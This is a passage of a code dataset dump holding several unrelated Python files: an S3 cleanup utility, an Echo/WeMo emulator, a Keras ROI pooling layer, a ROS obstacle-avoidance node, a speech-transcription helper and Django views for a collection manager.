stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n files=[]\n for line in p.stdout.readlines():\n #print(line)\n if True:\n #print(re.findall(r\"Listing#\\d+\\.csv.gz\",str(line)))\n if not condo:\n file = re.findall(r\"\\b\\D+#\\d+\\.csv.gz\",str(line))\n else:\n file = re.findall(r\"\\b\\D+#\\d+_condo\\.csv.gz\",str(line))\n if (len(file)>0) and (file[0].strip() not in exclude):\n files.append(file[0].strip())\n else:\n if not condo:\n file = re.findall(r\"\\b\\D+#\\d+\\.csv\",str(line))\n else:\n file = re.findall(r\"\\b\\D+#\\d+_condo\\.csv\",str(line))\n if (len(file)>0) and (file[0].strip() not in exclude):\n files.append(file[0].strip())\n return files\n \n def delete(self,files):\n for i, file in enumerate(files): \n cmdln = \"aws s3 rm s3://\" + self.bucket + \"/\" + file + \" --region us-east-2 \"\n print(cmdln)\n p = subprocess.Popen(cmdln, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for line in p.stdout.readlines():\n print(line)\n","sub_path":"common/Empty_File_S3.py","file_name":"Empty_File_S3.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"469355492","text":"#!/usr/bin/python2\n\n'''\n Max Kessler \n \n Main routine for the fauxmo WeMo emulator based on\n http://www.makermusings.com/2015/07/13/amazon-echo-and-home-automation/\n'''\n\nimport sys\nimport os\nimport time\nimport logging\nimport fauxmo\nimport handler\n\nfrom cmus_remote_py.cmus_remote_client_py2 import send_cmus_cmd\n\nlogging.basicConfig(filename='wemo.log',level=logging.DEBUG)\n#~ logging.basicConfig(stream=sys.stdout,level=logging.DEBUG)\nlogging.debug(\"\\nStart program\\n\")\n\n# List of scripts to run on the Raspberri pi.\n# Each entry is a list with the following elements:\n#\n# name of the virtual switch\n# object with 'on' and 'off' methods\n# port # (optional; may be omitted)\n\n# NOTE: As of 2015-08-17, the Echo appears to have a hard-coded 
limit of\n# 16 switches it can control. Only the first 16 elements of the FAUXMOS\n# list will be used.\n\ntry:\n\tSCRIPTS = [\n\t\t['test', handler.script_handler(\"test_script_on.sh\", \"test_script_off.sh\")],\n\t\t['cloud', handler.script_handler(\"remount.sh\")],\n\t\t['linie', handler.fct_handler(send_cmus_cmd, ['next', '192.168.0.11', 65001], send_cmus_cmd, ['prev', '192.168.0.11', 65001])],\n\t\t['desktop', handler.fct_handler(send_cmus_cmd, ['play', '192.168.0.11', 65001], send_cmus_cmd, ['pause', '192.168.0.11', 65001])]\n\t]\n\t\n\tlogging.debug(\"Scripts with handlers initialized.\")\nexcept Exception as e:\n\tlogging.debug(\"Initialization of scripts failed.\")\n\tlogging.critical(e)\n\t\n\n# Set up our singleton for polling the sockets for data ready\np = fauxmo.poller()\n\n# Set up our singleton listener for UPnP broadcasts\nu = fauxmo.upnp_broadcast_responder()\nu.init_socket()\n\n# Add the UPnP broadcast listener to the poller so we can respond\n# when a broadcast is received.\np.add(u)\n\n# Create our FauxMo virtual switch devices\nfor one_faux in SCRIPTS:\n\tif len(one_faux) == 2:\n\t\t# a fixed port wasn't specified, use a dynamic one\n\t\tone_faux.append(0)\n\tswitch = fauxmo.fauxmo(one_faux[0], u, p, None, one_faux[2], action_handler = one_faux[1])\n\nlogging.debug(\"Entering main loop\\n\")\n\nwhile True:\n\t#~ try:\n\t\t# Allow time for a ctrl-c to stop the process\n\tp.poll(100)\n\ttime.sleep(0.1)\n\t#~ except Exception as e:\n\t\t#~ logging.debug(\"Main loop exception:\")\n\t\t#~ logging.debug(\"type: {}, args: {}\".format(type(e), e.args))\n\t\t#~ logging.critical(e)\n\t\t\t\t\n\t\t#~ break\n\t\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"297443451","text":"\"\"\"\nRepresentation of a node of a cluster in System Center Virtual Machine Manager.\nTo follow cloud nomenclature, it is referred to here as 'Region'\n\"\"\"\n\n\n# pylint: disable=too-few-public-methods\nclass SCRegion():\n    REGIAO_PADRAO = 'default'\n\n    def __init__(self, id_no, nome_no, grupo, cluster, letra_id=None):\n        self.id_no = id_no\n        self.nome_no = nome_no\n        self.grupo = grupo\n        self.cluster = cluster\n        self.letra_id = letra_id\n\n    def __str__(self):\n        return f'''\n            id_no: {self.id_no}\n            nome_no: {self.nome_no}\n            grupo: {self.grupo}\n            cluster: {self.cluster}\n            letra_id: {self.letra_id}\n        '''\n","sub_path":"vmm_manager/scvmm/scregion.py","file_name":"scregion.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"532376653","text":"from keras.engine.topology import Layer\nimport keras.backend as K\n\nif K.backend() == 'tensorflow':\n    import tensorflow as tf\n\n\nclass RoiPoolingConv(Layer):\n    \"\"\"\n    ROI pooling dla wejsc 2D\n    Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition,\n    K. He, X. Zhang, S. Ren, J.
Sun\n\n # Parametry:\n pool_size: int\n Wielkosc obszaru, ustawienie np pool_size = 7 da obszar o wielkosci 7x7\n num_rois: int\n Ilosc obszarow zainteresowania, ktore powinny zostac uzyte\n # Wejscie:\n lista dwoch tensorow [X_img,X_roi] o strukturze:\n X_img: macierz 4D o strukturze (1, wiersze, kolumny, kanaly (kolory))\n X_roi: tensor 3D (1, num_rois, 4), lista rois z formatem (x,y,w,h)\n # Wyjscie:\n Tensor 3D o formacie (1, num_rois, pool_size, pool_size, kanaly)\n \"\"\"\n\n def __init__(self, pool_size, num_rois, **kwargs):\n\n self.dim_ordering = K.image_dim_ordering()\n assert self.dim_ordering in {'tf', 'th'}, 'dim_ordering must be in {tf, th}'\n\n self.pool_size = pool_size\n self.num_rois = num_rois\n\n super(RoiPoolingConv, self).__init__(**kwargs)\n\n def build(self, input_shape):\n if self.dim_ordering == 'th':\n self.nb_channels = input_shape[0][1]\n elif self.dim_ordering == 'tf':\n self.nb_channels = input_shape[0][3]\n\n def compute_output_shape(self, input_shape):\n if self.dim_ordering == 'th':\n return None, self.num_rois, self.nb_channels, self.pool_size, self.pool_size\n else:\n return None, self.num_rois, self.pool_size, self.pool_size, self.nb_channels\n\n def call(self, x, mask=None):\n\n assert(len(x) == 2)\n\n img = x[0]\n rois = x[1]\n\n input_shape = K.shape(img)\n\n outputs = []\n\n for roi_idx in range(self.num_rois):\n\n x = rois[0, roi_idx, 0]\n y = rois[0, roi_idx, 1]\n w = rois[0, roi_idx, 2]\n h = rois[0, roi_idx, 3]\n\n row_length = w / float(self.pool_size)\n col_length = h / float(self.pool_size)\n\n num_pool_regions = self.pool_size\n\n if self.dim_ordering == 'th':\n for jy in range(num_pool_regions):\n for ix in range(num_pool_regions):\n x1 = x + ix * row_length\n x2 = x1 + row_length\n y1 = y + jy * col_length\n y2 = y1 + col_length\n\n x1 = K.cast(x1, 'int32')\n x2 = K.cast(x2, 'int32')\n y1 = K.cast(y1, 'int32')\n y2 = K.cast(y2, 'int32')\n\n x2 = x1 + K.maximum(1,x2-x1)\n y2 = y1 + K.maximum(1,y2-y1)\n\n new_shape = [input_shape[0], input_shape[1],\n y2 - y1, x2 - x1]\n\n x_crop = img[:, :, y1:y2, x1:x2]\n xm = K.reshape(x_crop, new_shape)\n pooled_val = K.max(xm, axis=(2, 3))\n outputs.append(pooled_val)\n\n elif self.dim_ordering == 'tf':\n x = K.cast(x, 'int32')\n y = K.cast(y, 'int32')\n w = K.cast(w, 'int32')\n h = K.cast(h, 'int32')\n\n rs = tf.image.resize_images(img[:, y:y+h, x:x+w, :], (self.pool_size, self.pool_size))\n outputs.append(rs)\n\n final_output = K.concatenate(outputs, axis=0)\n final_output = K.reshape(final_output, (1, self.num_rois, self.pool_size, self.pool_size, self.nb_channels))\n\n if self.dim_ordering == 'th':\n final_output = K.permute_dimensions(final_output, (0, 1, 4, 2, 3))\n else:\n final_output = K.permute_dimensions(final_output, (0, 1, 2, 3, 4))\n\n return final_output\n","sub_path":"keras_frcnn/RoiPoolingConv.py","file_name":"RoiPoolingConv.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"357337254","text":"import datetime\nimport time\n\n@outputSchema(\"{(port:int, count:int)}\")\ndef portdist(ports):\n ports_notup = [p[0] for p in ports]\n d = {}\n for p in ports_notup:\n if p in d:\n d[p] += 1\n else:\n d[p] = 1\n return [(k, v) for k, v in d.iteritems()]\n\n@outputSchema(\"{(key:int, count:int)}\")\ndef portgrp(ports):\n ports_notup = [p[0] for p in ports]\n sys = []\n reg = []\n eph = []\n for p in ports_notup:\n if p > 49151:\n eph.append(p)\n elif p > 1023:\n reg.append(p)\n else:\n 
sys.append(p)\r\n    sysd = {}\r\n    for p in sys:\r\n        if p in sysd:\r\n            sysd[p] += 1\r\n        else:\r\n            sysd[p] = 1\r\n    regd = {}\r\n    for p in reg:\r\n        k = (p - 1024) // 100\r\n        if k in regd:\r\n            regd[k] += 1\r\n        else:\r\n            regd[k] = 1\r\n    ephd = {}\r\n    for p in eph:\r\n        k = (p - 49152) // 1000\r\n        if k in ephd:\r\n            ephd[k] += 1\r\n        else:\r\n            ephd[k] = 1\r\n    sysl = [(k, v) for k, v in sysd.iteritems()]\r\n    regl = [(k + 1024, v) for k, v in regd.iteritems()]\r\n    ephl = [(k + 1505, v) for k, v in ephd.iteritems()]\r\n    return sysl + regl + ephl\r\n\r\n@outputSchema(\"ts:int\")\r\ndef ts2epoch(ts):\r\n    return int(time.mktime(datetime.datetime.strptime(''.join([chr(c) for c in ts]), \"%Y-%m-%d %H:%M:%S\").timetuple()))\r\n\r\n@outputSchema(\"{(bin_id:double, count:int)}\")\r\ndef countDistinct(elems):\r\n    count = {}\r\n    for e in elems:\r\n        if e[0] in count:\r\n            count[e[0]] += 1\r\n        else:\r\n            count[e[0]] = 1\r\n    return [(k, v) for k, v in count.iteritems()]\r\n","sub_path":"misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"149173052","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom geometry_msgs.msg import Twist\n\nrangeAhead = 0\nmaxRange = 0\nminRange = 0\nright = 0\nleft = 0\n\ndef rangeCallback(msg):\n    global rangeAhead, maxRange, minRange, left, right\n    rangeAhead = msg.ranges[int(len(msg.ranges) / 2)]\n    maxRange = max(msg.ranges)\n    minRange = min(msg.ranges)\n    right = msg.ranges[0]\n    left = msg.ranges[len(msg.ranges) - 1]\n\ndef botHandler():\n    pub = rospy.Publisher('hokuyobot/cmd_vel', Twist, queue_size = 10 )\n    vel = Twist()\n    while not (rospy.is_shutdown()):\n\n        if(minRange != 0 and minRange < .45):\n            if(left < right):\n                vel.angular.z = 2/minRange\n            else:\n                vel.angular.z = -2/minRange\n        else:\n            vel.angular.z = 0\n        vel.linear.x = rangeAhead * .75\n        pub.publish(vel)\n\nif __name__ == '__main__':\n    rospy.init_node('Navigate')\n    rangeSub = rospy.Subscriber('hokuyobot/laser/scan', LaserScan, rangeCallback)\n    botHandler()\n","sub_path":"learning_robot_control/scripts/avoidObstaclesV2.py","file_name":"avoidObstaclesV2.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"67323840","text":"import cv2\nimport IPython\n\nimg=cv2.imread('C:\\\\Users\\\\USER\\\\Desktop\\\\AirDraw\\\\SpongeImg\\\\Nature.jpg')\n\n#cv2.getTickCount() returns the number of clock cycles\n#cv2.getTickFrequency() returns the number of clock cycles per second\n\n#example\ne1 = cv2.getTickCount()\nfor i in range(5,49,2):\n    img = cv2.medianBlur(img,i)\ne2 = cv2.getTickCount()\nt = (e2 - e1)/cv2.getTickFrequency()\nprint (t)\n# Result I got is 0.521107655 seconds\n\n#Optimization: On/Off\n# check if optimization is enabled\nprint(cv2.useOptimized())\n\n#%timeit res = cv2.medianBlur(img,49)\n#10 loops, best of 3: 34.9 ms per loop\n\n# Disable it\ncv2.setUseOptimized(False)\n\nprint(cv2.useOptimized())\n\n#%timeit res = cv2.medianBlur(img,49)\n#10 loops, best of 3: 64.1 ms per loop\n\n\n#Measuring Performance in IPython with the %timeit magic, see documentation\n\n#Python and cv2 methods are usually faster than np methods when it comes to small operations.\n\n#1. Avoid using loops in Python as far as possible, especially double/triple loops etc. They are inherently slow.\n#2. Vectorize the algorithm/code to the maximum possible extent because Numpy and OpenCV are optimized for vector operations.\n#3. Exploit the cache coherence.\n#4. Never make copies of an array unless it is needed.
Try to use views instead. Array copying is a costly operation.\n\n\n\n","sub_path":"Core Operations/Performance/Perform.py","file_name":"Perform.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"271033313","text":"# Uses Google Speech Api and makes a request\n# Transcribes audio file and searches for the keyword(lyric)\n# Returns start and end time of the keyword(lyric)\nimport io\nimport re\nfrom google.cloud import speech\nfrom google.cloud.speech import enums\nfrom google.cloud.speech import types\n\ndef transcribe_file(speech_file, lyric, index):\n client = speech.SpeechClient()\n\n with io.open(speech_file, 'rb') as audio_file:\n content = audio_file.read()\n\n audio = types.RecognitionAudio(content=content)\n config = types.RecognitionConfig(\n encoding=enums.RecognitionConfig.AudioEncoding.FLAC,\n sample_rate_hertz=48000,\n language_code='en-US',\n enable_word_time_offsets=True)\n\n response = client.recognize(config, audio)\n\n for result in response.results:\n alternative = result.alternatives[0]\n print('Transcript: {}'.format(alternative.transcript))\n print('Confidence: {}'.format(alternative.confidence))\n\n for word_info in alternative.words:\n word_info.word = re.sub(r'[^\\w\\s]','',word_info.word)\n word = word_info.word\n if(word.lower() == lyric[index].lower()):\n start_time = word_info.start_time\n end_time = word_info.end_time\n print('Word: {}, start_time: {}, end_time: {}'.format(\n word,\n start_time.seconds + start_time.nanos * 1e-9,\n end_time.seconds + end_time.nanos * 1e-9))\n return word_info\n break\n return word_info","sub_path":"transcribe.py","file_name":"transcribe.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"612428374","text":"# -*- coding: UTF-8 -*-\n\n'''\nCreated on Apr 20, 2016\n\n@author: k.maciejczuk\n'''\n\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import modelformset_factory\nfrom django.forms.widgets import HiddenInput\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\nfrom django.views.generic.base import View\n\nfrom main.constants import Buttons\nfrom main.forms import Collection_New_Form, Collection_New_Attributes_Form, New_List_Form, \\\n Item_Form, Additional_Values_Form, Item_Amount_Form\nfrom main.models import Collections, Attribute_Types, Support_Tables, Support_Values, Items, \\\n Additional_Attributes\nfrom main.helpers import Redirect_Link as RL\n\n\nclass Main(View):\n \"\"\"\n @PODSUMOWANIE: Widok wyboru kolekcji.\n @DANE: Ten widok nie wymaga dodatkowych danych\n \"\"\"\n view_template = \"main.html\"\n TITLE = u\"Wybierz zbior / kolekcje\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, *args, **kwargs):\n # WUtwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"collection_new\": Buttons.COLLECTION_NEW\n })\n\n def post(self, request, *args, **kwargs):\n pass\n\n def dispatch(self, *args, **kwargs):\n return super(Main, self).dispatch(*args, **kwargs)\n\n\nclass Collection_New(View):\n \"\"\"\n @PODSUMOWANIE: Widok tworzenia nowej kolekcji.\n @DANE: Ten widok nie wymaga dodatkowych 
danych\n \"\"\"\n view_template = \"collection_new.html\"\n TITLE = u\"Stwórz nową kolekcję\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, *args, **kwargs):\n # Utwórz formularz nowej kolekcji\n name_form = Collection_New_Form()\n # Utwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n })\n\n def post(self, request, *args, **kwargs):\n # Utwórz forumlarz i uzupełnij go o dane z formularza\n name_form = Collection_New_Form(request.POST)\n # Waliduj\n if name_form.is_valid():\n # Zapisz i przekieruj na widok kolekcji\n collection = name_form.save()\n return redirect(reverse(\"collection_edit\",\n kwargs={\"collection\": collection.id}))\n # Jeśli walidaja się nie powiodła, utwórz listę elementów listy prawego menu składającą się z istniejących kolekcji\n scroll_menu = [item.make_link() for item in Collections.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_New, self).dispatch(*args, **kwargs)\n\n\nclass Collection_Edit(View):\n \"\"\"\n @PODSUMOWANIE: Widok edycji nazwy , opisu i atrybutów kolekcji.\n @DANE: collection - numer id kolekcji\n \"\"\"\n view_template = \"collection_edit.html\"\n TITLE = u\"Edycja atrybutów przedmiotów: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n ATTRIBUTES_FORMSET = modelformset_factory(Additional_Attributes,\n Collection_New_Attributes_Form,\n can_delete=True,\n extra=0)\n\n def get(self, request, collection, *args, **kwargs):\n # Zamień numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n # Utwórz formularz z instacją obiektu\n name_form = Collection_New_Form(instance=collection)\n # Uzupełnij dane początkowe do formsetu\n initial_data = []\n existing_attributes = Additional_Attributes.objects.filter(collection=collection)\n if existing_attributes.count() == 0: # Brak atrybutów, utwórz tylko jeden pusty formularz\n initial_data.append({\"collection\": collection})\n else: # Utwórz tyle danych początkowych ile jest atrybutów\n for each in existing_attributes:\n initial_data.append({\"collection\": collection,\n \"name\": each.name,\n \"attribute_type\": each.attribute_type,\n \"support_table\": each.support_table})\n # Wypełnij zestaw danymi początkowymi\n formset = self.ATTRIBUTES_FORMSET(initial=initial_data,\n queryset=Additional_Attributes.objects.filter(collection=collection))\n # Utwórz dane do dynamicznego tworzenia formularzy\n js_attribute_types = {item[\"id\"]: item[\"name\"] for item in Attribute_Types.objects.all().values(\"id\", \"name\")}\n js_support_lists = {item[\"id\"]: item[\"name\"] for item in Support_Tables.objects.all().values(\"id\", \"name\")}\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection.id),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection.id),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection.id)]\n #Utwórz listę elementów listy prawego menu składającą się z istniejących elementów kolekcji\n scroll_menu = [item_obj.make_link() for 
item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n \"formset\": formset,\n \"attribute_types\": js_attribute_types,\n \"support_lists\": js_support_lists,\n \"collection\": collection.id\n })\n\n def post(self, request, collection, *args, **kwargs):\n # Zamień numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n # Utwórz formularz z instacją obiektu uzupełnionym o dane przychodzące z formularza\n name_form = Collection_New_Form(data=request.POST,\n instance=collection)\n\n message = ''\n # Waliduj, zapisz i dodaj stosowną informację zwrotną\n if name_form.is_valid():\n collection = name_form.save()\n message += \"Nazwa i opis kolekcji zostały zapisane poprawnie. \"\n else:\n message += \"Nazwa i opis kolekcji nie zostały zapisane. \"\n\n # Uzupełnij zestaw danymi przychodzącymi\n formset = self.ATTRIBUTES_FORMSET(data=request.POST,\n queryset=Additional_Attributes.objects.filter(collection=collection))\n # Waliduj, zapisz i dodaj stosowną informację zwrotną\n if formset.is_valid():\n formset.save()\n message += \"Atrybuty kolekcji zostały zapisane poprawnie.\"\n else:\n message += \"Atrybuty kolekcji nie zostały zapisane.\"\n\n # Jeśli wszystko jest prawidłowo wypełnione, odśwież całą kolekcję i odeślij do widoku tejże kolekcji\n if name_form.is_valid() and formset.is_valid():\n collection.update_whole_collection()\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection.id}))\n # Utwórz dane do dynamicznego tworzenia formularzy\n js_attribute_types = mark_safe({att_type.id: att_type.name for att_type in Attribute_Types.objects.all()})\n js_support_lists = mark_safe({supp_list.id: supp_list.name for supp_list in Support_Tables.objects.all()})\n # dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection.id),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection.id),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection.id)]\n #Utwórz listę elementów listy prawego menu składającą się z istniejących elementów kolekcji\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"name_form\": name_form,\n \"formset\": formset,\n \"attribute_types\": js_attribute_types,\n \"support_lists\": js_support_lists,\n \"message\": message,\n \"collection\": collection.id\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_Edit, self).dispatch(*args, **kwargs)\n\n\nclass Collection_Delete(View):\n \"\"\"\n @PODSUMOWANIE: Widok potwierdzenia usunięcia kolekcji i obsługa kasowania.\n @DANE: collection - numer id kolekcji\n \"\"\"\n view_template = \"collection_delete.html\"\n TITLE = u\"Skasuj kolekcję: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, collection, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element 
kolekcji\",\n collection=collection)]\n # Zamien numer id na obiekt\n collection = Collections.objects.get(pk=collection)\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"collection\": collection\n })\n\n def post(self, request, collection, *args, **kwargs):\n # W przypadku potwierdzenia, skasuj kolekcję (przynależne obiekty kasują się automatycznie)\n if request.POST.get(\"submit\", False) == \"Tak\":\n Collections.objects.get(pk=collection).delete()\n return redirect(reverse(\"home\"))\n # Jeśli nie, to odeślij do widoku kolekcji\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection}\n ))\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_Delete, self).dispatch(*args, **kwargs)\n\n\nclass Collection_View(View):\n \"\"\"\n @PODSUMOWANIE: Widok główny pojedynczej kolekcji.\n @DANE: collection - numer id kolekcji\n item - numer id elementu. Niewymagany\n \"\"\"\n view_template = \"collection_view.html\"\n TITLE = u\"Przegląd elementów kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n \n def get(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n if item is not None: # Przegląd elementu - dodatkowe przyciski, dane elementu i formularz ilości\n edit_button = RL(url=\"item_edit\",\n title=\"Edytuj ten obiekt\",\n collection=collection,\n item=item)\n delete_button = RL(url=\"item_delete\",\n title=\"Skasuj ten obiekt\",\n collection=collection,\n item=item)\n item = Items.objects.get(pk=item)\n item.set_additional_attributes_as_dict()\n amount_form = Item_Amount_Form(instance=item)\n else: # Brak wybranego elementu\n amount_form = ''\n edit_button = ''\n delete_button = ''\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n collection = Collections.objects.get(pk=collection)\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": item,\n \"amount_form\": amount_form,\n \"message\": collection.description,\n \"edit_button\": edit_button,\n \"delete_button\": delete_button,\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n if item is not None: # Przegląd elementu - dodatkowe przyciski, dane elementu i formularz ilości\n edit_button = RL(url=\"item_edit\",\n title=\"Edytuj ten obiekt\",\n collection=collection,\n item=item)\n delete_button = RL(url=\"item_delete\",\n title=\"Skasuj ten obiekt\",\n collection=collection,\n item=item)\n item = Items.objects.get(pk=item)\n 
item.set_additional_attributes_as_dict()\n amount_form = Item_Amount_Form(data=request.POST,\n instance=item)\n if amount_form.is_valid():\n amount_form.save()\n else: # Brak wybranego elementu\n amount_form = ''\n edit_button = ''\n delete_button = ''\n # Utwórz listę elementów kolekcji do prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n collection = Collections.objects.get(pk=collection)\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": item,\n \"amount_form\": amount_form,\n \"message\": collection.description,\n \"edit_button\": edit_button,\n \"delete_button\": delete_button,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Collection_View, self).dispatch(*args, **kwargs)\n\n\nclass Item_Edit(View):\n \"\"\"\n @PODSUMOWANIE: Widok edycji pojedynczego elementu.\n @DANE: collection - numer id kolekcji\n item - numer id elementu, niewymagany\n \"\"\"\n view_template = \"item_edit.html\"\n TITLE = u\"Edycja elementu kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n # TODO: Prevent loading view if there are no additional_attributes\n def get(self, request, collection, item=None, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n # Zamień numer id na obiekt \n collection = Collections.objects.get(pk=collection)\n \n if item is not None: # Edycja elementu, inicjalizuj formularz przedmiotu i jego atrybutów\n item_instance = Items.objects.get(pk=item)\n item_form = Item_Form(instance=item_instance)\n values_form = Additional_Values_Form(item=item_instance)\n message = ''\n else: # Nowy element, inicjalizuj tylko formularz nowego przedmiotu\n item_form = Item_Form(initial={\"collection\": collection})\n values_form = ''\n message = \"Wybierz element kolekcji z listy po prawej, albo dodaj nowy.\"\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item_form\": item_form,\n \"values_form\": values_form,\n \"message\": message\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n if item is None:\n item_form = Item_Form(data=request.POST)\n else:\n item_form = Item_Form(data=request.POST,\n instance=Items.objects.get(pk=item))\n\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n\n values_form = ''\n if item_form.is_valid():\n saved_item = item_form.save()\n if item is not None:\n values_form = Additional_Values_Form(item=saved_item,\n data=request.POST)\n if values_form.is_valid():\n values_form.save()\n return redirect(reverse(\"item_view\", kwargs={\"collection\": collection, \"item\": saved_item.id}))\n return redirect(reverse(\"item_edit\", kwargs={\"collection\": 
